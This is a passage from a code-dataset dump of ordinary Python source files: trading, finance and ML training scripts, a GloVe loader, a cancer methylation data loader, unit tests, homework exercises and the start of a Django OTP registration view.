\"0\")\r\n\r\n    def get_balance_count(self):\r\n        \"\"\"매도 주문이 접수되지 않은 보유 종목 수를 계산하는 함수\"\"\"\r\n        balance_count = len(self.kiwoom.balance)\r\n        # kiwoom balance에 존재하는 종목이 매도 주문 접수되었다면 보유 종목에서 제외시킴\r\n        for code in self.kiwoom.order.keys():\r\n            if code in self.kiwoom.balance and self.kiwoom.order[code]['주문구분'] == \"매도\" and self.kiwoom.order[code][\r\n                '미체결수량'] == 0:\r\n                balance_count = balance_count - 1\r\n        return balance_count\r\n\r\n    def get_buy_order_count(self):\r\n        \"\"\"매수 주문 종목 수를 계산하는 함수\"\"\"\r\n        buy_order_count = 0\r\n        # 아직 체결이 완료되지 않은 매수 주문\r\n        for code in self.kiwoom.order.keys():\r\n            if code not in self.kiwoom.balance and self.kiwoom.order[code]['주문구분'] == \"매수\":\r\n                buy_order_count = buy_order_count + 1\r\n        return buy_order_count\r\n","repo_name":"joshorjoshua/QuantTrading","sub_path":"strategy/Strategy.py","file_name":"Strategy.py","file_ext":"py","file_size_in_byte":15440,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"17893031794","text":"\"\"\"\nauthor : sayantan (sayantan.ghosh@strandls.com)\nWorking on a dynamic financial manager web development project using Flask\n\"\"\"\n\nimport json, os, sys, enum\nfrom datetime import datetime\nfrom pprint import pprint\n\njson_file = '../data/financial-details.json'\nprop_file = '../data/user-details.prop'\nmessages = '../data/messages.json'\ncurrent_datetime = datetime.now()\n\ndef check_file_exists(filename):\n\tif not os.path.exists(filename):\n\t\traise Exception(messages['error-messages']['FILE_NOT_PRESENT'].format(filename))\n\ndef read_json(json_file):\n\tcheck_file_exists(json_file)\n\treturn json.load(open(json_file, 'r'))\n\ndef read_properties(prop_file):\n\tcheck_file_exists(prop_file)\n\tprop_dict = dict()\n\tfor line in open(prop_file, 'r').readlines():\n\t\tkey, value = line.split('=')\n\t\tprop_dict[key] = value.strip()\n\treturn prop_dict\n\ndef get_datetime_object(dateTimeStr):\n\treturn datetime.strptime(dateTimeStr, '%d-%m-%Y %H:%M:%S.%f')\n\ndef get_investment_tenure(startDateObj, endDateObj):\n\tif current_datetime > endDateObj:\n\t\ttime_diff = endDateObj - startDateObj\n\telif current_datetime < endDateObj:\n\t\ttime_diff = current_datetime - startDateObj\n\treturn time_diff.days / 365\n\nclass InvestmentType(enum.Enum):\n\tfixedDeposit = 'Fixed Deposit'\n\trecurringDeposit = 'Recurring Deposit'\n\tppf = 'Public Provident Fund'\n\nclass Investment():\n\tdef __init__(self, principal, rate, time, startDate, endDate):\n\t\tself.principal = principal\n\t\tself.rate = rate\n\t\tself.time = 
time\n\t\tself.startDate = startDate\n\t\tself.endDate = endDate\n\n\tdef toString(self):\n\t\tprint('PRINCIPAL : {}, RATE : {}, TIME : {}, START DATE : {}, END DATE : {}'.format(self.principal, self.rate, \\\n\t\t\tself.time, self.startDate, self.endDate))\n\nclass FixedDeposit(Investment):\n\tdef __init__(self, principal, rate, time, startDate, endDate):\n\t\tsuper().__init__(principal, rate, time, startDate, endDate)\n\t\tself.type = InvestmentType.fixedDeposit.value\n\n\tdef calculateAmount(self):\n\t\tstartDateObj, endDateObj = [get_datetime_object(self.startDate), get_datetime_object(self.endDate)]\n\t\ttime_diff_years = get_investment_tenure(startDateObj, endDateObj)\n\t\t# Interest is compounded quaterly for a fixed deposit\n\t\tamount = self.principal * (1 + (self.rate / 4) / 100) ** (4 * time_diff_years)\n\t\treturn amount\n\nclass RecurringDeposit(Investment):\n\tdef __init__(self, principal, rate, time, startDate, endDate):\n\t\tsuper().__init__(principal, rate, time, startDate, endDate)\n\t\tself.type = InvestmentType.recurringDeposit.value\n\n\tdef calculateAmount(self):\n\t\tstartDateObj, endDateObj = [get_datetime_object(self.startDate), get_datetime_object(self.endDate)]\n\t\ttime_diff_years = int(get_investment_tenure(startDateObj, endDateObj))\n\t\t# Interest is compounded quaterly (amount is the sum of the series)\n\t\ttenure = round(time_diff_years) * 12\n\t\tmaturity_amount = 0\n\t\tfor month in range(tenure,0,-1):\n\t\t\tamount = self.principal * (1 + (self.rate / 4) / 100) ** (4 * (month/12))\n\t\t\tmaturity_amount += amount\n\t\treturn maturity_amount\n\nclass PublicProvidentFund(Investment):\n\tdef __init__(self, principal, rate, time, startDate, endDate):\n\t\tsuper().__init__(principal, rate, time, startDate, endDate)\n\t\tself.type = InvestmentType.ppf.value\n\n\tdef calculateAmount(self):\n\t\tpass\n\ndef print_user_details(user_details):\n\tfor key in user_details.keys():\n\t\tprint('{} : {}'.format(key.upper(), user_details[key]))\n\ndef create_investment_objects(investment_dict, investment_type):\n\tinvestment_objects = list()\n\tfor investment in investment_dict[investment_type]:\n\t\tif investment_type == InvestmentType.fixedDeposit.value:\n\t\t\tdeposit = FixedDeposit(investment['Principal'], investment['Rate'], investment['Time'], \n\t\t\t\tinvestment['Start Date'], investment['End Date'])\n\t\telif investment_type == InvestmentType.recurringDeposit.value:\n\t\t\tdeposit = RecurringDeposit(investment['Principal'], investment['Rate'], investment['Time'],\n\t\t\t\tinvestment['Start Date'], investment['End Date'])\n\t\telse:\n\t\t\traise Exception('Unknown Investment Type : {} provided'.format(investment_type))\n\t\tinvestment_objects.append(deposit)\n\treturn investment_objects\n\ndef process_finance():\n\tuser_details = read_properties(prop_file)\n\tprint_user_details(user_details)\n\tfinancial_details = read_json(json_file)\n\tfd_objects = create_investment_objects(financial_details, InvestmentType.fixedDeposit.value)\n\trd_objects = create_investment_objects(financial_details, InvestmentType.recurringDeposit.value)\n\tfor fd_object in fd_objects:\n\t\tprint(fd_object.calculateAmount())\n\tfor rd_object in rd_objects:\n\t\tprint(rd_object.calculateAmount())\n\nif __name__ == '__main__':\n\tprocess_finance()\n","repo_name":"sayantansls/financial-manager","sub_path":"src/finances.py","file_name":"finances.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} 
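The fixed-deposit record above compounds interest quarterly, i.e. A = P * (1 + (r/4)/100) ** (4 * t). A quick standalone check of that formula, kept separate from the record itself; the figures below are illustrative and not taken from the record.

def fd_maturity(principal: float, annual_rate_pct: float, years: float) -> float:
    # Quarterly compounding, mirroring FixedDeposit.calculateAmount above.
    return principal * (1 + (annual_rate_pct / 4) / 100) ** (4 * years)

print(round(fd_maturity(10000, 6.5, 2), 2))  # 10000 * 1.01625**8 -> 11376.39

The recurring-deposit method in the same record applies this formula once per monthly installment and sums the series, which is why its loop runs over the months of the tenure.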
+{"seq_id":"74326367576","text":"from mock import Mock, MagicMock\nfrom nose.tools import ok_\n\nfrom pylease.ctxmgmt import Caution, ReplacedSetup\nfrom tests import PyleaseTest, MockedSetupPy\n\n\nclass ContextManagersTest(PyleaseTest):\n def test_replaced_setup_must_replace_the_setuptools_setup_with_provided_callback(self):\n key1 = 'key1'\n val1 = 'val1'\n key2 = 'key2'\n val2 = 'val2'\n\n kwargs = {key1: val1, key2: val2}\n setup_py = \"\"\"\n from setuptools import setup\n\n kwargs = {{'{}': '{key1}', '{}': '{key2}'}}\n setup(**kwargs)\n \"\"\". format(key1, key2, **kwargs)\n\n callback = Mock()\n\n with ReplacedSetup(callback):\n with MockedSetupPy(setup_py, self):\n __import__('setup')\n\n callback.assert_called_once_with(**kwargs)\n\n def test_caution_context_manager_must_rollback_everything_if_error_occurs(self):\n rb1 = MagicMock()\n rb2 = MagicMock()\n rb3 = MagicMock()\n\n with Caution() as caution:\n caution.add_rollback(rb1)\n caution.add_rollback(rb2)\n\n raise Exception()\n\n rb1.assert_called_once_with()\n rb2.assert_called_once_with()\n ok_(not rb3.called)\n\n def test_caution_context_manager_should_leave_everythin_as_is_if_no_error_occurs(self):\n rb1 = MagicMock()\n\n with Caution() as caution:\n caution.add_rollback(rb1)\n\n ok_(not rb1.called)\n","repo_name":"bagrat/pylease","sub_path":"tests/test_ctxmgmt.py","file_name":"test_ctxmgmt.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"68"} +{"seq_id":"38017422081","text":"from dataLoaders import *\nfrom catalyst.dl import SupervisedRunner, CallbackOrder, Callback, CheckpointCallback\nfrom config import *\nfrom funcs import get_dict_from_class,count_parameters\nfrom models import FeatureExtractor,modelling_3d\nfrom losses import BCELoss\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nimport pandas as pd\nfrom catalyst import dl\n#from callbacks import MetricsCallback\nfrom sklearn.model_selection import StratifiedKFold\nimport torch\ndef train(model_param,model_,data_loader_param,data_loader,loss_func,callbacks=None,pretrained=None):\n randSeed=23\n data_load = data_loader(**get_dict_from_class(data_loader_param))\n criterion = loss_func\n model = model_(**get_dict_from_class(model_param))\n count_parameters(model)\n # model = FCLayered(**get_dict_from_class(model_param,model))\n if pretrained is not None:\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n checkpoint = torch.load(pretrained, map_location=device)\n try:\n model.load_state_dict(checkpoint['model_state_dict'])\n except:\n model.load_state_dict(checkpoint)\n model.eval()\n optimizer = optim.SGD(model.parameters(), lr=lr)\n\n\n train = data_load.data\n train[\"fold\"] = -1\n temp=train['patient_id'].unique()\n temp_dict={}\n for t in temp:\n temp_dict[t]=random.randint(0,10)\n train['fold']=train['patient_id'].apply(lambda x:temp_dict[x])\n\n\n\n\n # # check the proportion\n #fold_proportion = pd.pivot_table(train, columns=\"fold\", values=\"label\", aggfunc=len)\n\n use_fold = 0\n\n train_file = train.query(\"fold != @use_fold\")\n val_file = train.query(\"fold == @use_fold\")\n\n print(\"[fold {}] train: {}, val: {}\".format(use_fold, len(train_file['patient_id']), len(val_file['patient_id'])))\n\n loaders = {\n \"train\": DataLoader(data_loader( data_frame=train_file,**get_dict_from_class(data_loader_param)),\n batch_size=2,\n shuffle=False,\n num_workers=1,\n pin_memory=True,\n drop_last=False),\n \"valid\": 
DataLoader(data_loader(data_frame=val_file, **get_dict_from_class(data_loader_param)),\n batch_size=2,\n shuffle=False,\n num_workers=1,\n pin_memory=True,\n drop_last=False)\n }\n\n callbacks = callbacks\n runner = SupervisedRunner(\n\n output_key=\"logits\",\n input_key=\"image_pixels\",\n target_key=\"targets\")\n # scheduler=scheduler,\n\n runner.train(\n model=model,\n criterion=criterion,\n loaders=loaders,\n optimizer=optimizer,\n\n num_epochs=epoch,\n verbose=True,\n logdir=f\"fold0\",\n callbacks=callbacks,\n )\n\n # main_metric = \"epoch_f1\",\n # minimize_metric = False\n\nif __name__ == \"__main__\":\n from callbacks import *\n\n callbacks = [MetricsCallback(input_key=\"targets\", output_key=\"logits\",\n directory=saveDirectory, model_name='rsna'),dl.AUCCallback(\n input_key=\"logits\", target_key=\"targets\")]\n train(model_param,model,data_loader_param,data_loader,loss_func,callbacks,pretrained=pre_trained_model)","repo_name":"vivektewari/rsna_cnn_classification","sub_path":"codes/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33478060527","text":"import unittest\nfrom Classes.Ticket import Ticket\nfrom Enums.Sections import Section\nfrom Classes.TicketDecorator import decorate_ticket\n\n\nclass TestTicketDecorator(unittest.TestCase):\n def test_decorate_ticket(self):\n ticket = Ticket(Section.PHARMACY, 1)\n test_value = decorate_ticket(ticket)\n desired_value = f\"\"\"---------------------------------------\n| Welcome to Nice Shops INC. \n| Your turn is:\n| \n| \\t\\tPH1\n|\n| Go to pharmacy and wait your turn.\n|\n| Respect the 1.5m space between\n| other clients and remember\n| that smoking is forbidden.\n|\n| Thank you and have a nice day.\n---------------------------------------\"\"\"\n self.assertEqual(test_value, desired_value)\n\n","repo_name":"sszahinos/Python-Total-Course","sub_path":"Day 8 - Shop Turn Manager/test/TestTicketDecorator.py","file_name":"TestTicketDecorator.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"30956720898","text":"#1 point\n#create a function exampleOne with four input parameters.\n#return a new dictionary where 1st and 3rd parameter will be keys,\n#and 2nd and 4th will be values, so your key-value pair will be 1st-2nd, 3-4th\ndef exampleOne(paramOne, paramTwo, paramThree, paramFour):\n return {paramOne: paramTwo, paramThree: paramFour}\nprint(exampleOne('key1', 'val1', 'key2', 'val2'))\n\n#2 points\n#create a function exampleTwo with one parameter which will be an array of arrays, where inner arrays have 2 elements\n#iterate over each element in the array and extract first element as a key, second as a value\n#construct a dictionary out of them\n#e.g input( [ [\"key1\",\"value1\"], [\"key2\",\"value2\"] ] -> output dictionary of matching pairs \"key1\"-\"value2\", \"key2\"-\"value2\"\ndef exampleTwo(paramOne):\n return {kv[0]: kv[1] for kv in paramOne}\nprint(exampleTwo([[\"key1\", \"value1\"], [\"key2\", \"value2\"]]))\n\n\n#2 points\n#create a function exampleThree with two input paratmers, first one is a random dictionary, second is a random key\n#return the square of retrieved element, if input key(second param) is present in input dictionary(first param)\n#if not present, return 0\n#create a function exampleThree with two input paratmers, first one is a random dictionary, second is a random 
key\n#return the square of retrieved element, if input key(second param) is present in input dictionary(first param)\n#if not present, return 0\ndef exampleThree(paramOne, paramTwo):\n if paramTwo not in paramOne:\n return 0\n return paramOne[paramTwo] * paramOne[paramTwo]\nrandom_dictionary = {25: 1, 50: 10}\nrandom_key = 50\nprint(exampleThree(random_dictionary, random_key))\n\n#5 points\n#create function exampleFour with two input parameters, first one is an array of letters, second is words\n#return the new dictionary where letters are matched with words based on the first letter, i.e. abbreviation\n#you can assume that all of the letters and words will be a unique match, i.e. if 5 letters, then there are 5 words\n#e.g. inputs [\"D\",\"M\",\"V\"], [\"Motor\",\"Division\",\"Vehicles\"] -> out dictionary of \"D\"-\"Division\",\"M\"-\"Motor\",\"Vehicles\"\ndef exampleFour(paramOne, paramTwo):\n result = {}\n for key in paramOne:\n for value in paramTwo:\n if value.startswith(key):\n result[key] = value\n break\n return result\nprint(exampleFour([\"D\",\"M\",\"V\"], [\"Motor\",\"Division\",\"Vehicles\"]))\n","repo_name":"clairemorawski/python","sub_path":"Homework5/HW_Dict_To_Fill.py","file_name":"HW_Dict_To_Fill.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72510511898","text":"import time\nimport pickle\nimport tensorflow as tf\nfrom Models.SOPOptimizer import setup_sop_optimizer\nfrom Models.SOPOptimizer import evaluate_loss_on_batch\nfrom Utils.load_data import load_mnist_sop_data\n\ntic = time.time()\ndataset_name = 'sop'\npath_to_trained_models = './Results/trained_models/' + dataset_name + '/'\nmodels = {\n 1: {'model_dir': 'igr', 'model_type': 'IGR_I'},\n 2: {'model_dir': 'gs', 'model_type': 'GS'},\n 3: {'model_dir': 'pf', 'model_type': 'IGR_Planar'},\n 4: {'model_dir': 'sb', 'model_type': 'IGR_SB_Finite'},\n}\nselect_case = 2\nrun_with_sample = False\n# samples_n = 1 * int(1.e3)\nsamples_n = 1 * int(1.e3)\n\nhyper_file, weights_file = 'hyper.pkl', 'w.h5'\nmodel_type = models[select_case]['model_type']\npath_to_trained_models += models[select_case]['model_dir'] + '/'\n\nwith open(file=path_to_trained_models + hyper_file, mode='rb') as f:\n hyper = pickle.load(f)\n\nbatch_n = hyper['batch_size']\nhyper['test_sample_size'] = samples_n\ntf.random.set_seed(seed=hyper['seed'])\ndata = load_mnist_sop_data(batch_n=hyper['batch_size'], run_with_sample=run_with_sample)\ntrain_dataset, test_dataset = data\nepoch = hyper['epochs']\nsop_optimizer = setup_sop_optimizer(hyper=hyper)\nfor x in train_dataset:\n x_upper = x[:, :14, :, :]\n break\nsop_optimizer.batch_n = batch_n\naux = sop_optimizer.model.call(x_upper)\nsop_optimizer.model.load_weights(filepath=path_to_trained_models + weights_file)\n\ntest_loss_mean = tf.keras.metrics.Mean()\nfor x in test_dataset:\n loss = evaluate_loss_on_batch(x, sop_optimizer, hyper)\n test_loss_mean(loss)\n\nevaluation_print = f'Epoch {epoch:4d} || '\nevaluation_print += f'TeNLL {-test_loss_mean.result():2.5e} || '\n# evaluation_print += f'Train Loss {train_loss_mean.result():2.5e} || '\nevaluation_print += f'{model_type} || '\ntoc = time.time()\nevaluation_print += f'Time: {toc - tic:2.2e} 
sec'\nprint(evaluation_print)\n","repo_name":"cunningham-lab/igr","sub_path":"structure_output_prediction/test_trained.py","file_name":"test_trained.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"68"} +{"seq_id":"12492851286","text":"#\r\n# WordRepImport.py\r\n#\r\n# Methods for loading in word representation data (GLoVe)\r\n#\r\n\r\n\r\nimport csv\r\nimport time\r\nimport numpy as np\r\n\r\nfrom Utils import *\r\n\r\n\r\nclass WordRepLibrary():\r\n\r\n # Import the word representation library (GLoVe)\r\n def __init__(self, path):\r\n print(\"Loading word representation library '\"+path.split('/')[-1]+\"'\")\r\n start_time = time.time()\r\n self.library = pd.read_table(path, sep=' ', keep_default_na=False,\r\n index_col=0, quoting=csv.QUOTE_NONE, encoding=\"utf8\", header=None)\r\n t = (time.time() - start_time)\r\n print(\"Loading word representation library took \"+str(t)+\" seconds.\\n\")\r\n self.n_words = self.library.shape[0]\r\n self.ci_roots = None\r\n self.ci_vocab = None\r\n\r\n # Get a specific word representation by integer count index\r\n def get_wrep_by_int(self, i):\r\n return list(self.library.iloc[i])\r\n\r\n # Get a specific word representation\r\n def get_wrep(self, word):\r\n return list(self.library.loc[word])\r\n\r\n # Get a specific word representation and it's index\r\n def get_wrepi(self, w, ignore_case_if_missing=True):\r\n if ignore_case_if_missing and w not in self.library.index:\r\n w = self.autocorrect_word(w)\r\n return self.library.index.get_loc(w), self.get_wrep(w)\r\n\r\n # Autocorrect a word to match a word in this library\r\n def autocorrect_word(self, word):\r\n self._build_autocorrect_index()\r\n return self.ci_roots[word_root(word)]\r\n\r\n def _build_autocorrect_index(self):\r\n if self.ci_roots is None:\r\n print(\"Constructing capitalisation autocorrection index...\")\r\n roots = {}\r\n for w in self.library.index:\r\n r = word_root(w)\r\n if r not in roots: roots[r] = []\r\n roots[r].append(w)\r\n self.ci_roots = {w: sorted(roots[w])[-1] for w in roots}\r\n print(\"Completed.\")\r\n\r\n # Adjust capitalisation autocorrection index to use 1gram count modes (+++)\r\n def import_autocorrect_1grams(self, ngrams_db):\r\n print(\"Importing 1gram capitalisation autocorrection index...\")\r\n self._build_autocorrect_index()\r\n ngrams_db_roots = dict(list(zip(list(map(word_root,\r\n ngrams_db.index.values)), ngrams_db.index.values)))\r\n for r in self.ci_roots:\r\n if r in ngrams_db_roots:\r\n w = ngrams_db_roots[r]\r\n if w in self.library.index:\r\n self.ci_roots[r] = w\r\n print(\"Completed 1grams import.\")\r\n\r\n # Get a specific word representation and it's index if it exists\r\n def get_wrepi_if_exists(self, word):\r\n return self.get_wrepi(word) if word in self.library.index else None\r\n\r\n # Check if a word exists in the library\r\n def get_exists(self, word):\r\n return word in self.library.index\r\n\r\n # Same but ignoring case (assumes input word is all lowercase)\r\n def get_exists_ci(self, word):\r\n if self.ci_vocab is None:\r\n print(\"Case-insensitive vocabulary for representation library...\")\r\n self.ci_vocab = set([w.lower() for w in self.library.index])\r\n print(\"Completed\")\r\n return word in self.ci_vocab\r\n\r\n # Get a new, random unseen word from the library\r\n def get_new_word(self, i_seen=None, autocorrect_caps=True):\r\n\r\n # Get a random word (index) to add (that we haven't added yet)\r\n word_i = None\r\n if i_seen is 
None:\r\n word_i = np.random.randint(0, self.n_words)\r\n else:\r\n i_rem = [i for i in range(self.n_words) if i not in i_seen]\r\n word_i = i_rem[np.random.randint(0, len(i_rem))]\r\n\r\n word = self.library.index[word_i]\r\n if autocorrect_caps:\r\n word = self.autocorrect_word(word)\r\n return (word,) + self.get_wrepi(word)\r\n\r\n return word, word_i, self.get_wrep_by_int(word_i)\r\n\r\n\r\n","repo_name":"jigawhat/languart","sub_path":"WordRepLibrary.py","file_name":"WordRepLibrary.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33972907479","text":"import os\n\nimport numpy as np\nimport pandas as pd\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch import Tensor\nfrom itertools import chain\n\nclass CancerDatasetWrapper:\n\tclass __CancerDatasetWrapper:\n\t\t\"\"\"\n\t\tA standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.\n\t\t\"\"\"\n\t\tdef __init__(self, cv_iters):\n\t\t\t\"\"\"\n\t\t\tcreate df for features and labels\n\t\t\tremove samples that are not shared between the two tables\n\t\t\t\"\"\"\n\n\t\t\tself.cv_iters = cv_iters\n\t\t\tself.labels = pd.read_csv(\"TCGA-BRCA.survival.tsv\",delimiter='\\t',encoding='utf-8') \n\t\t\t#filter LumA donors\n\t\t\tdonor = pd.read_csv(\"TCGA_PAM50.txt\",delimiter='\\t',encoding='utf-8') \n\t\t\tdonor = donor[donor['PAM50_genefu'] == 'LumA']\n\t\t\tdonor = donor['submitted_donor_id']\n\n\t\t\tself.labels = self.labels[self.labels['_PATIENT'].isin(donor)]\n\t\t\tlabel_sample_list = list(self.labels['sample'])\n\n\t\t\tself.features = pd.read_csv(\"TCGA-BRCA.methylation450.tsv\",delimiter='\\t',encoding='utf-8') \n\t\t\tself.features = self.features.dropna().reset_index(drop=True)\n\t\t\tself.features = self.features.drop([list(self.features.columns.values)[0]], axis=1)\n\n\t\t\tfeature_sample_list = list(self.features.columns.values)\n\t\t\tsamples = list(set(label_sample_list) & set(feature_sample_list))\n\t\t\t\n\t\t\t#only keep LumA samples to limit the memory usage\n\t\t\tself.features = self.features[samples]\n\t\t\tself.labels = self.labels[self.labels['sample'].isin(samples)]\n\n\t\t\tself.shuffle()\n\n\t\tdef label(self, key):\n\t\t\t\"\"\"\n\t\t\tArgs: \n\t\t\t\tkey:(string) the sample key\t\n\t\t\tReturns:\n\t\t\t\tlabel to the life and death of patient\n\t\t\t\"\"\"\n\t\t\treturn self.labels[self.labels['sample'] == key]['OS']\n\n\t\tdef shuffle(self):\n\t\t\t\"\"\"\n\t\t\tcategorize sample ID by label\n\t\t\t\"\"\"\n\t\t\t#keys to feature where label is 1\n\t\t\tself.ones = list(self.labels[self.labels['OS']==1]['sample'])\n\t\t\tindex = np.arange(len(self.ones))\n\t\t\tnp.random.shuffle(index)\n\t\t\tself.ones = [self.ones[index[i]] for i in range(index.shape[0])]\n\t\t\tself.ones = [self.ones[int(len(self.ones)/self.cv_iters)*i: int(len(self.ones)/self.cv_iters)*(i+1)] for i in range(self.cv_iters)]\n\n\t\t\t#keys to feature where label is 0\n\t\t\tself.zeros = list(self.labels[self.labels['OS']==0]['sample'])\n\t\t\tindex = np.arange(len(self.zeros))\n\t\t\tnp.random.shuffle(np.arange(len(self.zeros)))\n\t\t\tself.zeros = [self.zeros[index[i]] for i in range(index.shape[0])]\n\t\t\tself.zeros = [self.zeros[int(len(self.zeros)/self.cv_iters)*i: int(len(self.zeros)/self.cv_iters)*(i+1)] for i in range(self.cv_iters)]\n\n\t\t\t#index of valication set\n\t\t\tself.CVindex = 0\n\n\t\tdef next(self):\n\t\t\t'''\n\t\t\trotate to the next cross validation 
process\n\t\t\t'''\n\t\t\tif self.CVindex < self.cv_iters-1:\n\t\t\t\tself.CVindex += 1\n\t\t\telse:\n\t\t\t\tself.CVindex = 0\n\n\n\tinstance = None\n\tdef __init__(self, cv_iters, shuffle = 0):\n\t\tif not CancerDatasetWrapper.instance:\n\t\t\tCancerDatasetWrapper.instance = CancerDatasetWrapper.__CancerDatasetWrapper(cv_iters)\n\n\t\tif shuffle:\n\t\t\tCancerDatasetWrapper.instance.shuffle()\n\n\tdef __getattr__(self, name):\n\t\treturn getattr(self.instance, name)\n\n\tdef features(self, key):\n\t\t\"\"\"\n\t\tArgs: \n\t\t\tkey:(string) value from dataset\t\n\t\tReturns:\n\t\t\tfeatures in list\t\n\t\t\"\"\"\n\t\treturn np.array(list(CancerDatasetWrapper.instance.features[key]))\n\n\tdef label(self, key):\n\t\t\"\"\"\n\t\tArgs: \n\t\t\tkey:(string) the sample key/id\t\n\t\tReturns:\n\t\t\tlabel to the life and death of patient\n\t\t\"\"\"\n\t\treturn np.array(list(CancerDatasetWrapper.instance.label(key)))\n\n\tdef next(self):\n\t\tCancerDatasetWrapper.instance.next()\n\n\tdef shuffle(self):\n\t\tCancerDatasetWrapper.instance.shuffle()\n\n\tdef __trainSet(self):\n\t\t\"\"\"\n\t\tReturns:\n\t\t\tdataset: (np.ndarray) array of key/id of trainning set\n\t\t\"\"\"\n\n\t\tind = list(range(CancerDatasetWrapper.instance.cv_iters))\n\t\tind = np.delete(ind, CancerDatasetWrapper.instance.CVindex)\n\n\t\ttrainSet = list(chain(*[CancerDatasetWrapper.instance.zeros[i] for i in ind]))+list(chain(*[CancerDatasetWrapper.instance.ones[i] for i in ind]))\n\n\t\treturn trainSet\n\t\n\tdef __valSet(self):\n\t\t\"\"\"\n\t\tReturns:\n\t\t\tdataset: (np.ndarray) array of key/id of validation set\n\t\t\"\"\"\n\n\t\tvalSet = CancerDatasetWrapper.instance.zeros[CancerDatasetWrapper.instance.CVindex] + CancerDatasetWrapper.instance.ones[CancerDatasetWrapper.instance.CVindex]\n\n\t\treturn valSet\n\n\tdef __fullSet(self):\n\t\t\"\"\"\n\t\tReturns:\n\t\t\tdataset: (np.ndarray) array of key/id of full dataset\n\t\t\"\"\"\n\n\t\tfullset = list(chain(*CancerDatasetWrapper.instance.zeros))+list(chain(*CancerDatasetWrapper.instance.ones))\n\n\t\treturn fullset\n\n\tdef getDataSet(self, dataSetType = 'train'):\n\t\t\"\"\"\n\t\tArgs: \n\t\t\tdataSetType: (string) 'train' or 'val'\t\n\t\tReturns:\n\t\t\tdataset: (np.ndarray) array of key/id of data set\n\t\t\"\"\"\n\n\t\tif dataSetType == 'train':\n\t\t\treturn self.__trainSet()\n\n\t\tif dataSetType == 'val':\n\t\t\treturn self.__valSet()\n\n\t\treturn self.__fullSet()\n\t\t\n\n\nclass CancerDataset(Dataset):\n\t\"\"\"\n\tA standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.\n\t\"\"\"\n\tdef __init__(self, dataSetType, CV_iters):\n\t\t\"\"\"\n\t\tinitialize DatasetWrapper\n\t\t\"\"\"\n\t\tself.DatasetWrapper = CancerDatasetWrapper(CV_iters)\n\n\t\tself.samples = self.DatasetWrapper.getDataSet(dataSetType)\n\n\tdef __len__(self):\n\t\t# return size of dataset\n\t\treturn len(self.samples)\n\n\n\tdef __getitem__(self, idx):\n\t\t\"\"\"\n\t\tFetch feature and labels from dataset using index of the sample.\n\n\t\tArgs:\n\t\t idx: (int) index of the sample\n\n\t\tReturns:\n\t\t feature: (Tensor) feature\n\t\t label: (int) corresponding label of sample\n\t\t\"\"\"\n\t\tsample = self.samples[idx]\n\t\treturn Tensor(self.DatasetWrapper.features(sample)), self.DatasetWrapper.label(sample)\n\n\ndef fetch_dataloader(types, params):\n\t\"\"\"\n\tFetches the DataLoader object for each type in types.\n\n\tArgs:\n\ttypes: (list) has one or more of 'train', 'val'depending on which data is required '' to get the full dataSet\n\tparams: (Params) 
hyperparameters\n\n\tReturns:\n\tdata: (dict) contains the DataLoader object for each type in types\n\t\"\"\"\n\tdataloaders = {}\n\t\n\tif len(types)>0:\n\t\tfor split in types:\n\t\t\tif split in ['train', 'val']:\n\t\t\t\tdl = DataLoader(CancerDataset(split, params.CV_iters), batch_size=params.batch_size, shuffle=True,\n\t\t\t\t\tnum_workers=params.num_workers,\n\t\t\t\t\tpin_memory=params.cuda)\n\n\t\t\t\tdataloaders[split] = dl\n\telse:\n\t\tdl = DataLoader(CancerDataset('',params.CV_iters), batch_size=params.batch_size, shuffle=True,\n\t\t\tnum_workers=params.num_workers,\n\t\t\tpin_memory=params.cuda)\n\n\t\treturn dl\n\n\treturn dataloaders\n\ndef get_next_CV_set(CV_iters):\n\tDatasetWrapper = CancerDatasetWrapper(CV_iters)\n\tDatasetWrapper.next()\n","repo_name":"Bozhao-Liu/LumACat_test","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":6466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38827652770","text":"from django.core.mail import send_mail\nfrom django.conf import settings\nfrom django.shortcuts import get_object_or_404\nfrom django.http import JsonResponse\nfrom random import randint\nfrom rest_framework.views import APIView\nfrom rest_framework.decorators import api_view\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .serializers import CustomUserSerailizer, LoginSerializer, DriverReviewSerializer, CustomDriverSerializer, CustomDriverLoginSerializer\nfrom .models import CustomUser, RideRequest, CustomDriver, Review, Admin, CustomDriverToken, AcceptedDriver\nfrom .authentication import CustomDriverBackend\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.authtoken.models import Token\nfrom django.contrib.auth import get_user_model\nfrom decimal import Decimal\nfrom rest_framework.parsers import MultiPartParser\nfrom django.contrib.auth.password_validation import validate_password\nfrom django.core.exceptions import ValidationError\nimport random\nimport string\nimport threading\nfrom geopy import distance\n\n\nclass RegisterAndSendOTP(APIView):\n def post(self, request):\n User = get_user_model()\n email = request.data.get('email')\n if not email:\n return Response({'error': 'Please provide your email'}, status=status.HTTP_400_BAD_REQUEST)\n\n # Check if email is already registered\n if User.objects.filter(email=email).exists():\n return 